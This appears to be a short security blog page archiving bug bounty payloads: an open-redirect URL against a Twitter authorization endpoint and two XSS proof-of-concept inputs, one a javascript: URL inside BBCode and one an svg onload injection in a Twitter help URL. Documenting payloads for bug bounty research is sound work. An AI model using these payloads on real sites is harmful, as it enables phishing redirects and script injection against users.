Marsの5εcur1ty備忘録

不定期的にCTF、脆弱性検証、バグバウンティレポート分析など、情報セキュリティを中心とした技術ブログを更新します。

Bug Bounty Payload Archive

Open Redirection

  1. Twitter Open Redirection

    https://twitter.com/teams/authorize?target_screen_name=&authorize_callback=//www.fb.com

Description:
This payload will redirect from twitter.com to www.fb.com

XSS

i='[url=javascript://%0aalert`1`] click me![/url]'

Description:
Just post it to server.
PS: payload alert `1` works in many situations.

https://help.twitter.com/en/using-twitter/follow-requests#'><svg/onload=alert(1)> Description:
Just send this URL to server.

Copyright Mars 2019